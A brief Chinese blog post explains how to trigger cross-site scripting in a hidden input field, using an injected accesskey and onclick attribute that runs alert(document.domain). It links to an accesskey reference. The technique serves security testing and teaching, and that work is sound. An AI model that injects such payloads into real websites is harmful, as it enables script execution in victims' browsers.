Hidden属性的input标签中XSS的触发方法

<input type="hidden" name="returnurl" value="" accesskey="X" onclick="alert(document.domain)" />

触发方法不同的浏览器不同,具体可参考https://www.w3school.com.cn/jsref/prop_html_accesskey.asp

posted on 2021-05-18 10:51  tech_lee  阅读(798)  评论(0编辑  收藏  举报

导航